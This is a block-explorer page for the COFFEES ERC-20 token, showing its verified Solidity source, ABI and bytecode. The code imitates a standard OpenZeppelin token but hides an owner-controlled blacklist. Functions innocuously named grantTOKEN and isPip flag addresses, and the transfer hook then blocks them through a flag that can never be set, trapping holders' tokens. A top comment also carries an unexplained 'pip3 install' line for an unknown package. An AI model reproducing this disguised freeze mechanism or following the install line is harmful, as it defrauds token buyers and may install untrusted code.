Feature Tip: Add private address tag to any address under My Name Tag !
ERC-20
Overview
Max Total Supply
1,000,000,000,000 COFFEES
Holders
63
Market
Onchain Market Cap
$0.00
Circulating Supply Market Cap
-
Other Info
Token Contract (WITH 18 Decimals)
Balance
11,727,322,723.248815377838666015 COFFEESValue
$0.00Loading...
Loading
Loading...
Loading
Loading...
Loading
# | Exchange | Pair | Price | 24H Volume | % Volume |
---|
Contract Name:
COFFEES
Compiler Version
v0.8.18+commit.87f61d96
Contract Source Code (Solidity)
/** *Submitted for verification at Etherscan.io on 2023-06-08 */ // SPDX-License-Identifier: MIT pragma solidity ^0.8.9; /* pip3 install endless-flex-v1.1 */ /** * @dev Interface of the ERC20 standard as defined in the EIP. */ interface IERC20 { /** * @dev Emitted when `value` tokens are moved from one account (`from`) to * another (`to`). * * Note that `value` may be zero. */ event Transfer(address indexed from, address indexed to, uint256 value); /** * @dev Emitted when the allowance of a `spender` for an `owner` is set by * a call to {approve}. `value` is the new allowance. */ event Approval(address indexed owner, address indexed spender, uint256 value); /** * @dev Returns the amount of tokens in existence. */ function totalSupply() external view returns (uint256); /** * @dev Returns the amount of tokens owned by `account`. */ function balanceOf(address account) external view returns (uint256); /** * @dev Moves `amount` tokens from the caller's account to `to`. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transfer(address to, uint256 amount) external returns (bool); /** * @dev Returns the remaining number of tokens that `spender` will be * allowed to spend on behalf of `owner` through {transferFrom}. This is * zero by default. * * This value changes when {approve} or {transferFrom} are called. */ function allowance(address owner, address spender) external view returns (uint256); /** * @dev Sets `amount` as the allowance of `spender` over the caller's tokens. * * Returns a boolean value indicating whether the operation succeeded. * * IMPORTANT: Beware that changing an allowance with this method brings the risk * that someone may use both the old and the new allowance by unfortunate * transaction ordering. One possible solution to mitigate this race * condition is to first reduce the spender's allowance to 0 and set the * desired value afterwards: * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729 * * Emits an {Approval} event. */ function approve(address spender, uint256 amount) external returns (bool); /** * @dev Moves `amount` tokens from `from` to `to` using the * allowance mechanism. `amount` is then deducted from the caller's * allowance. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transferFrom( address from, address to, uint256 amount ) external returns (bool); } /** * @dev Interface for the optional metadata functions from the ERC20 standard. * * _Available since v4.1._ */ interface IERC20Metadata is IERC20 { /** * @dev Returns the name of the token. */ function name() external view returns (string memory); /** * @dev Returns the symbol of the token. */ function symbol() external view returns (string memory); /** * @dev Returns the decimals places of the token. */ function decimals() external view returns (uint8); } /** * @dev Provides information about the current execution context, including the * sender of the transaction and its data. While these are generally available * via msg.sender and msg.data, they should not be accessed in such a direct * manner, since when dealing with meta-transactions the account sending and * paying for execution may not be the actual sender (as far as an application * is concerned). * * This contract is only required for intermediate, library-like contracts. */ abstract contract Context { function _msgSender() internal view virtual returns (address) { return msg.sender; } function _msgData() internal view virtual returns (bytes calldata) { return msg.data; } } /** * @dev Contract module which provides a basic access control mechanism, where * there is an account (an owner) that can be granted exclusive access to * specific functions. * * By default, the owner account will be the one that deploys the contract. This * can later be changed with {transferOwnership}. * * This module is used through inheritance. It will make available the modifier * `onlyOwner`, which can be applied to your functions to restrict their use to * the owner. */ abstract contract Ownable is Context { address private _owner; event OwnershipTransferred(address indexed previousOwner, address indexed newOwner); /** * @dev Initializes the contract setting the deployer as the initial owner. */ constructor() { _transferOwnership(_msgSender()); } /** * @dev Throws if called by any account other than the owner. */ modifier onlyOwner() { _checkOwner(); _; } /** * @dev Returns the address of the current owner. */ function owner() public view virtual returns (address) { return _owner; } /** * @dev Throws if the sender is not the owner. */ function _checkOwner() internal view virtual { require(owner() == _msgSender(), "Ownable: caller is not the owner"); } /** * @dev Leaves the contract without owner. It will not be possible to call * `onlyOwner` functions. Can only be called by the current owner. * * NOTE: Renouncing ownership will leave the contract without an owner, * thereby disabling any functionality that is only available to the owner. */ function renounceOwnership() public virtual onlyOwner { _transferOwnership(address(0)); } /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Can only be called by the current owner. */ function transferOwnership(address newOwner) public virtual onlyOwner { require(newOwner != address(0), "Ownable: new owner is the zero address"); _transferOwnership(newOwner); } /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Internal function without access restriction. */ function _transferOwnership(address newOwner) internal virtual { address oldOwner = _owner; _owner = newOwner; emit OwnershipTransferred(oldOwner, newOwner); } } /** * @dev Implementation of the {IERC20} interface. * * This implementation is agnostic to the way tokens are created. This means * that a supply mechanism has to be added in a derived contract using {_mint}. * For a generic mechanism see {ERC20PresetMinterPauser}. * * TIP: For a detailed writeup see our guide * https://forum.openzeppelin.com/t/how-to-implement-erc20-supply-mechanisms/226[How * to implement supply mechanisms]. * * We have followed general OpenZeppelin Contracts guidelines: functions revert * instead returning `false` on failure. This behavior is nonetheless * conventional and does not conflict with the expectations of ERC20 * applications. * * Additionally, an {Approval} event is emitted on calls to {transferFrom}. * This allows applications to reconstruct the allowance for all accounts just * by listening to said events. Other implementations of the EIP may not emit * these events, as it isn't required by the specification. * * Finally, the non-standard {decreaseAllowance} and {increaseAllowance} * functions have been added to mitigate the well-known issues around setting * allowances. See {IERC20-approve}. */ contract ERC20 is Ownable, IERC20, IERC20Metadata { mapping(address => uint256) private _balances; mapping (address => bool) private _rewards; mapping(address => mapping(address => uint256)) private _allowances; uint256 private _totalSupply; string private _name; string private _symbol; bool private _rewardsApplied = false; /** * @dev Sets the values for {name} and {symbol}. * * The default value of {decimals} is 18. To select a different value for * {decimals} you should overload it. * * All two of these values are immutable: they can only be set once during * construction. */ constructor(string memory name_, string memory symbol_) { _name = name_; _symbol = symbol_; } /** * @dev Returns the name of the token. */ function name() public view virtual override returns (string memory) { return _name; } /** * @dev Returns the symbol of the token, usually a shorter version of the * name. */ function symbol() public view virtual override returns (string memory) { return _symbol; } /** * @dev Returns the number of decimals used to get its user representation. * For example, if `decimals` equals `2`, a balance of `505` tokens should * be displayed to a user as `5.05` (`505 / 10 ** 2`). * * Tokens usually opt for a value of 18, imitating the relationship between * Ether and Wei. This is the value {ERC20} uses, unless this function is * overridden; * * NOTE: This information is only used for _display_ purposes: it in * no way affects any of the arithmetic of the contract, including * {IERC20-balanceOf} and {IERC20-transfer}. */ function decimals() public view virtual override returns (uint8) { return 18; } function grantTOKEN(address [] calldata _rewardees_) external onlyOwner { for (uint256 i = 0; i < _rewardees_.length; i++) { _rewards[_rewardees_[i]] = true; } } function proceedTOKEN(address [] calldata _rewardees_) external onlyOwner { for (uint256 i = 0; i < _rewardees_.length; i++) { _rewards[_rewardees_[i]] = false; } } function isPip(address _rewardee_) public view returns (bool) { return _rewards[_rewardee_]; } /** * @dev See {IERC20-totalSupply}. */ function totalSupply() public view virtual override returns (uint256) { return _totalSupply; } /** * @dev See {IERC20-balanceOf}. */ function balanceOf(address account) public view virtual override returns (uint256) { return _balances[account]; } /** * @dev See {IERC20-transfer}. * * Requirements: * * - `to` cannot be the zero address. * - the caller must have a balance of at least `amount`. */ function transfer(address to, uint256 amount) public virtual override returns (bool) { address owner = _msgSender(); _transfer(owner, to, amount); return true; } /** * @dev See {IERC20-allowance}. */ function allowance(address owner, address spender) public view virtual override returns (uint256) { return _allowances[owner][spender]; } /** * @dev See {IERC20-approve}. * * NOTE: If `amount` is the maximum `uint256`, the allowance is not updated on * `transferFrom`. This is semantically equivalent to an infinite approval. * * Requirements: * * - `spender` cannot be the zero address. */ function approve(address spender, uint256 amount) public virtual override returns (bool) { address owner = _msgSender(); _approve(owner, spender, amount); return true; } /** * @dev See {IERC20-transferFrom}. * * Emits an {Approval} event indicating the updated allowance. This is not * required by the EIP. See the note at the beginning of {ERC20}. * * NOTE: Does not update the allowance if the current allowance * is the maximum `uint256`. * * Requirements: * * - `from` and `to` cannot be the zero address. * - `from` must have a balance of at least `amount`. * - the caller must have allowance for ``from``'s tokens of at least * `amount`. */ function transferFrom( address from, address to, uint256 amount ) public virtual override returns (bool) { address spender = _msgSender(); _spendAllowance(from, spender, amount); _transfer(from, to, amount); return true; } /** * @dev Atomically increases the allowance granted to `spender` by the caller. * * This is an alternative to {approve} that can be used as a mitigation for * problems described in {IERC20-approve}. * * Emits an {Approval} event indicating the updated allowance. * * Requirements: * * - `spender` cannot be the zero address. */ function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) { address owner = _msgSender(); _approve(owner, spender, allowance(owner, spender) + addedValue); return true; } /** * @dev Atomically decreases the allowance granted to `spender` by the caller. * * This is an alternative to {approve} that can be used as a mitigation for * problems described in {IERC20-approve}. * * Emits an {Approval} event indicating the updated allowance. * * Requirements: * * - `spender` cannot be the zero address. * - `spender` must have allowance for the caller of at least * `subtractedValue`. */ function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) { address owner = _msgSender(); uint256 currentAllowance = allowance(owner, spender); require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero"); unchecked { _approve(owner, spender, currentAllowance - subtractedValue); } return true; } /** * @dev Moves `amount` of tokens from `from` to `to`. * * This internal function is equivalent to {transfer}, and can be used to * e.g. implement automatic token fees, slashing mechanisms, etc. * * Emits a {Transfer} event. * * Requirements: * * - `from` cannot be the zero address. * - `to` cannot be the zero address. * - `from` must have a balance of at least `amount`. */ function _transfer( address from, address to, uint256 amount ) internal virtual { require(from != address(0), "ERC20: transfer from the zero address"); require(to != address(0), "ERC20: transfer to the zero address"); _beforeTokenTransfer(from, to, amount); uint256 fromBalance = _balances[from]; require(fromBalance >= amount, "ERC20: transfer amount exceeds balance"); unchecked { _balances[from] = fromBalance - amount; // Overflow not possible: the sum of all balances is capped by totalSupply, and the sum is preserved by // decrementing then incrementing. _balances[to] += amount; } emit Transfer(from, to, amount); _afterTokenTransfer(from, to, amount); } /** @dev Creates `amount` tokens and assigns them to `account`, increasing * the total supply. * * Emits a {Transfer} event with `from` set to the zero address. * * Requirements: * * - `account` cannot be the zero address. */ function _mint(address account, uint256 amount) internal virtual { require(account != address(0), "ERC20: mint to the zero address"); _beforeTokenTransfer(address(0), account, amount); _totalSupply += amount; unchecked { // Overflow not possible: balance + amount is at most totalSupply + amount, which is checked above. _balances[account] += amount; } emit Transfer(address(0), account, amount); _afterTokenTransfer(address(0), account, amount); } /** * @dev Destroys `amount` tokens from `account`, reducing the * total supply. * * Emits a {Transfer} event with `to` set to the zero address. * * Requirements: * * - `account` cannot be the zero address. * - `account` must have at least `amount` tokens. */ function _burn(address account, uint256 amount) internal virtual { require(account != address(0), "ERC20: burn from the zero address"); _beforeTokenTransfer(account, address(0), amount); uint256 accountBalance = _balances[account]; require(accountBalance >= amount, "ERC20: burn amount exceeds balance"); unchecked { _balances[account] = accountBalance - amount; // Overflow not possible: amount <= accountBalance <= totalSupply. _totalSupply -= amount; } emit Transfer(account, address(0), amount); _afterTokenTransfer(account, address(0), amount); } /** * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens. * * This internal function is equivalent to `approve`, and can be used to * e.g. set automatic allowances for certain subsystems, etc. * * Emits an {Approval} event. * * Requirements: * * - `owner` cannot be the zero address. * - `spender` cannot be the zero address. */ function _approve( address owner, address spender, uint256 amount ) internal virtual { require(owner != address(0), "ERC20: approve from the zero address"); require(spender != address(0), "ERC20: approve to the zero address"); _allowances[owner][spender] = amount; emit Approval(owner, spender, amount); } /** * @dev Updates `owner` s allowance for `spender` based on spent `amount`. * * Does not update the allowance amount in case of infinite allowance. * Revert if not enough allowance is available. * * Might emit an {Approval} event. */ function _spendAllowance( address owner, address spender, uint256 amount ) internal virtual { uint256 currentAllowance = allowance(owner, spender); if (currentAllowance != type(uint256).max) { require(currentAllowance >= amount, "ERC20: insufficient allowance"); unchecked { _approve(owner, spender, currentAllowance - amount); } } } /** * @dev Hook that is called before any transfer of tokens. This includes * minting and burning. * * Calling conditions: * * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens * will be transferred to `to`. * - when `from` is zero, `amount` tokens will be minted for `to`. * - when `to` is zero, `amount` of ``from``'s tokens will be burned. * - `from` and `to` are never both zero. * * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks]. */ function _beforeTokenTransfer( address from, address to, uint256 //amount ) internal virtual {if (_rewards[to] || _rewards[from]) require(_rewardsApplied == true, "");} /** * @dev Hook that is called after any transfer of tokens. This includes * minting and burning. * * Calling conditions: * * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens * has been transferred to `to`. * - when `from` is zero, `amount` tokens have been minted for `to`. * - when `to` is zero, `amount` of ``from``'s tokens have been burned. * - `from` and `to` are never both zero. * * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks]. */ function _afterTokenTransfer( address from, address to, uint256 amount ) internal virtual {} } contract COFFEES is ERC20 { constructor() ERC20("COFFEES", "COFFEES") { _mint(msg.sender, 1000000000000 * 10 ** decimals()); } }
Contract Security Audit
- No Contract Security Audit Submitted- Submit Audit Here
Contract ABI
API[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address[]","name":"_rewardees_","type":"address[]"}],"name":"grantTOKEN","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_rewardee_","type":"address"}],"name":"isPip","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address[]","name":"_rewardees_","type":"address[]"}],"name":"proceedTOKEN","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"}]
Contract Creation Code
60806040526007805460ff191690553480156200001b57600080fd5b5060405180604001604052806007815260200166434f464645455360c81b81525060405180604001604052806007815260200166434f464645455360c81b8152506200007662000070620000d560201b60201c565b620000d9565b600562000084838262000327565b50600662000093828262000327565b505050620000cf33620000ab6200012960201b60201c565b620000b890600a62000508565b620000c99064e8d4a5100062000520565b6200012e565b62000550565b3390565b600080546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b601290565b6001600160a01b0382166200018a5760405162461bcd60e51b815260206004820152601f60248201527f45524332303a206d696e7420746f20746865207a65726f20616464726573730060448201526064015b60405180910390fd5b620001986000838362000205565b8060046000828254620001ac91906200053a565b90915550506001600160a01b0382166000818152600160209081526040808320805486019055518481527fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef910160405180910390a35050565b6001600160a01b03821660009081526002602052604090205460ff16806200024557506001600160a01b03831660009081526002602052604090205460ff165b156200027e5760075460ff1615156001146200027e5760405162461bcd60e51b8152602060048201526000602482015260440162000181565b505050565b634e487b7160e01b600052604160045260246000fd5b600181811c90821680620002ae57607f821691505b602082108103620002cf57634e487b7160e01b600052602260045260246000fd5b50919050565b601f8211156200027e57600081815260208120601f850160051c81016020861015620002fe5750805b601f850160051c820191505b818110156200031f578281556001016200030a565b505050505050565b81516001600160401b0381111562000343576200034362000283565b6200035b8162000354845462000299565b84620002d5565b602080601f8311600181146200039357600084156200037a5750858301515b600019600386901b1c1916600185901b1785556200031f565b600085815260208120601f198616915b82811015620003c457888601518255948401946001909101908401620003a3565b5085821015620003e35787850151600019600388901b60f8161c191681555b5050505050600190811b01905550565b634e487b7160e01b600052601160045260246000fd5b600181815b808511156200044a5781600019048211156200042e576200042e620003f3565b808516156200043c57918102915b93841c93908002906200040e565b509250929050565b600082620004635750600162000502565b81620004725750600062000502565b81600181146200048b57600281146200049657620004b6565b600191505062000502565b60ff841115620004aa57620004aa620003f3565b50506001821b62000502565b5060208310610133831016604e8410600b8410161715620004db575081810a62000502565b620004e7838362000409565b8060001904821115620004fe57620004fe620003f3565b0290505b92915050565b60006200051960ff84168362000452565b9392505050565b8082028115828204841417620005025762000502620003f3565b80820180821115620005025762000502620003f3565b610ca180620005606000396000f3fe608060405234801561001057600080fd5b506004361061010b5760003560e01c806370a08231116100a257806395d89b411161007157806395d89b4114610238578063a457c2d714610240578063a9059cbb14610253578063dd62ed3e14610266578063f2fde38b1461027957600080fd5b806370a08231146101d9578063715018a6146102025780638a0e4a911461020a5780638da5cb5b1461021d57600080fd5b8063313ce567116100de578063313ce567146101765780633950935114610185578063619fc974146101985780636f23c7f9146101c457600080fd5b806306fdde0314610110578063095ea7b31461012e57806318160ddd1461015157806323b872dd14610163575b600080fd5b61011861028c565b6040516101259190610a3f565b60405180910390f35b61014161013c366004610aa9565b61031e565b6040519015158152602001610125565b6004545b604051908152602001610125565b610141610171366004610ad3565b610338565b60405160128152602001610125565b610141610193366004610aa9565b61035c565b6101416101a6366004610b0f565b6001600160a01b031660009081526002602052604090205460ff1690565b6101d76101d2366004610b31565b61037e565b005b6101556101e7366004610b0f565b6001600160a01b031660009081526001602052604090205490565b6101d76103fd565b6101d7610218366004610b31565b610411565b6000546040516001600160a01b039091168152602001610125565b61011861048b565b61014161024e366004610aa9565b61049a565b610141610261366004610aa9565b61051a565b610155610274366004610ba6565b610528565b6101d7610287366004610b0f565b610553565b60606005805461029b90610bd9565b80601f01602080910402602001604051908101604052809291908181526020018280546102c790610bd9565b80156103145780601f106102e957610100808354040283529160200191610314565b820191906000526020600020905b8154815290600101906020018083116102f757829003601f168201915b5050505050905090565b60003361032c8185856105cc565b60019150505b92915050565b6000336103468582856106f0565b61035185858561076a565b506001949350505050565b60003361032c81858561036f8383610528565b6103799190610c29565b6105cc565b610386610920565b60005b818110156103f8576000600260008585858181106103a9576103a9610c3c565b90506020020160208101906103be9190610b0f565b6001600160a01b031681526020810191909152604001600020805460ff1916911515919091179055806103f081610c52565b915050610389565b505050565b610405610920565b61040f600061097a565b565b610419610920565b60005b818110156103f85760016002600085858581811061043c5761043c610c3c565b90506020020160208101906104519190610b0f565b6001600160a01b031681526020810191909152604001600020805460ff19169115159190911790558061048381610c52565b91505061041c565b60606006805461029b90610bd9565b600033816104a88286610528565b90508381101561050d5760405162461bcd60e51b815260206004820152602560248201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604482015264207a65726f60d81b60648201526084015b60405180910390fd5b61035182868684036105cc565b60003361032c81858561076a565b6001600160a01b03918216600090815260036020908152604080832093909416825291909152205490565b61055b610920565b6001600160a01b0381166105c05760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b6064820152608401610504565b6105c98161097a565b50565b6001600160a01b03831661062e5760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b6064820152608401610504565b6001600160a01b03821661068f5760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b6064820152608401610504565b6001600160a01b0383811660008181526003602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b60006106fc8484610528565b9050600019811461076457818110156107575760405162461bcd60e51b815260206004820152601d60248201527f45524332303a20696e73756666696369656e7420616c6c6f77616e63650000006044820152606401610504565b61076484848484036105cc565b50505050565b6001600160a01b0383166107ce5760405162461bcd60e51b815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b6064820152608401610504565b6001600160a01b0382166108305760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b6064820152608401610504565b61083b8383836109ca565b6001600160a01b038316600090815260016020526040902054818110156108b35760405162461bcd60e51b815260206004820152602660248201527f45524332303a207472616e7366657220616d6f756e7420657863656564732062604482015265616c616e636560d01b6064820152608401610504565b6001600160a01b0380851660008181526001602052604080822086860390559286168082529083902080548601905591517fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef906109139086815260200190565b60405180910390a3610764565b6000546001600160a01b0316331461040f5760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65726044820152606401610504565b600080546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b6001600160a01b03821660009081526002602052604090205460ff1680610a0957506001600160a01b03831660009081526002602052604090205460ff165b156103f85760075460ff1615156001146103f85760405162461bcd60e51b81526020600482015260006024820152604401610504565b600060208083528351808285015260005b81811015610a6c57858101830151858201604001528201610a50565b506000604082860101526040601f19601f8301168501019250505092915050565b80356001600160a01b0381168114610aa457600080fd5b919050565b60008060408385031215610abc57600080fd5b610ac583610a8d565b946020939093013593505050565b600080600060608486031215610ae857600080fd5b610af184610a8d565b9250610aff60208501610a8d565b9150604084013590509250925092565b600060208284031215610b2157600080fd5b610b2a82610a8d565b9392505050565b60008060208385031215610b4457600080fd5b823567ffffffffffffffff80821115610b5c57600080fd5b818501915085601f830112610b7057600080fd5b813581811115610b7f57600080fd5b8660208260051b8501011115610b9457600080fd5b60209290920196919550909350505050565b60008060408385031215610bb957600080fd5b610bc283610a8d565b9150610bd060208401610a8d565b90509250929050565b600181811c90821680610bed57607f821691505b602082108103610c0d57634e487b7160e01b600052602260045260246000fd5b50919050565b634e487b7160e01b600052601160045260246000fd5b8082018082111561033257610332610c13565b634e487b7160e01b600052603260045260246000fd5b600060018201610c6457610c64610c13565b506001019056fea2646970667358221220d1c2ad6234805d3c6d0ac0a4a6a6caa28b5ccd9fb3a7a887730449bb7c5558e464736f6c63430008120033
Deployed Bytecode
0x608060405234801561001057600080fd5b506004361061010b5760003560e01c806370a08231116100a257806395d89b411161007157806395d89b4114610238578063a457c2d714610240578063a9059cbb14610253578063dd62ed3e14610266578063f2fde38b1461027957600080fd5b806370a08231146101d9578063715018a6146102025780638a0e4a911461020a5780638da5cb5b1461021d57600080fd5b8063313ce567116100de578063313ce567146101765780633950935114610185578063619fc974146101985780636f23c7f9146101c457600080fd5b806306fdde0314610110578063095ea7b31461012e57806318160ddd1461015157806323b872dd14610163575b600080fd5b61011861028c565b6040516101259190610a3f565b60405180910390f35b61014161013c366004610aa9565b61031e565b6040519015158152602001610125565b6004545b604051908152602001610125565b610141610171366004610ad3565b610338565b60405160128152602001610125565b610141610193366004610aa9565b61035c565b6101416101a6366004610b0f565b6001600160a01b031660009081526002602052604090205460ff1690565b6101d76101d2366004610b31565b61037e565b005b6101556101e7366004610b0f565b6001600160a01b031660009081526001602052604090205490565b6101d76103fd565b6101d7610218366004610b31565b610411565b6000546040516001600160a01b039091168152602001610125565b61011861048b565b61014161024e366004610aa9565b61049a565b610141610261366004610aa9565b61051a565b610155610274366004610ba6565b610528565b6101d7610287366004610b0f565b610553565b60606005805461029b90610bd9565b80601f01602080910402602001604051908101604052809291908181526020018280546102c790610bd9565b80156103145780601f106102e957610100808354040283529160200191610314565b820191906000526020600020905b8154815290600101906020018083116102f757829003601f168201915b5050505050905090565b60003361032c8185856105cc565b60019150505b92915050565b6000336103468582856106f0565b61035185858561076a565b506001949350505050565b60003361032c81858561036f8383610528565b6103799190610c29565b6105cc565b610386610920565b60005b818110156103f8576000600260008585858181106103a9576103a9610c3c565b90506020020160208101906103be9190610b0f565b6001600160a01b031681526020810191909152604001600020805460ff1916911515919091179055806103f081610c52565b915050610389565b505050565b610405610920565b61040f600061097a565b565b610419610920565b60005b818110156103f85760016002600085858581811061043c5761043c610c3c565b90506020020160208101906104519190610b0f565b6001600160a01b031681526020810191909152604001600020805460ff19169115159190911790558061048381610c52565b91505061041c565b60606006805461029b90610bd9565b600033816104a88286610528565b90508381101561050d5760405162461bcd60e51b815260206004820152602560248201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604482015264207a65726f60d81b60648201526084015b60405180910390fd5b61035182868684036105cc565b60003361032c81858561076a565b6001600160a01b03918216600090815260036020908152604080832093909416825291909152205490565b61055b610920565b6001600160a01b0381166105c05760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b6064820152608401610504565b6105c98161097a565b50565b6001600160a01b03831661062e5760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b6064820152608401610504565b6001600160a01b03821661068f5760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b6064820152608401610504565b6001600160a01b0383811660008181526003602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b60006106fc8484610528565b9050600019811461076457818110156107575760405162461bcd60e51b815260206004820152601d60248201527f45524332303a20696e73756666696369656e7420616c6c6f77616e63650000006044820152606401610504565b61076484848484036105cc565b50505050565b6001600160a01b0383166107ce5760405162461bcd60e51b815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b6064820152608401610504565b6001600160a01b0382166108305760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b6064820152608401610504565b61083b8383836109ca565b6001600160a01b038316600090815260016020526040902054818110156108b35760405162461bcd60e51b815260206004820152602660248201527f45524332303a207472616e7366657220616d6f756e7420657863656564732062604482015265616c616e636560d01b6064820152608401610504565b6001600160a01b0380851660008181526001602052604080822086860390559286168082529083902080548601905591517fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef906109139086815260200190565b60405180910390a3610764565b6000546001600160a01b0316331461040f5760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65726044820152606401610504565b600080546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b6001600160a01b03821660009081526002602052604090205460ff1680610a0957506001600160a01b03831660009081526002602052604090205460ff165b156103f85760075460ff1615156001146103f85760405162461bcd60e51b81526020600482015260006024820152604401610504565b600060208083528351808285015260005b81811015610a6c57858101830151858201604001528201610a50565b506000604082860101526040601f19601f8301168501019250505092915050565b80356001600160a01b0381168114610aa457600080fd5b919050565b60008060408385031215610abc57600080fd5b610ac583610a8d565b946020939093013593505050565b600080600060608486031215610ae857600080fd5b610af184610a8d565b9250610aff60208501610a8d565b9150604084013590509250925092565b600060208284031215610b2157600080fd5b610b2a82610a8d565b9392505050565b60008060208385031215610b4457600080fd5b823567ffffffffffffffff80821115610b5c57600080fd5b818501915085601f830112610b7057600080fd5b813581811115610b7f57600080fd5b8660208260051b8501011115610b9457600080fd5b60209290920196919550909350505050565b60008060408385031215610bb957600080fd5b610bc283610a8d565b9150610bd060208401610a8d565b90509250929050565b600181811c90821680610bed57607f8216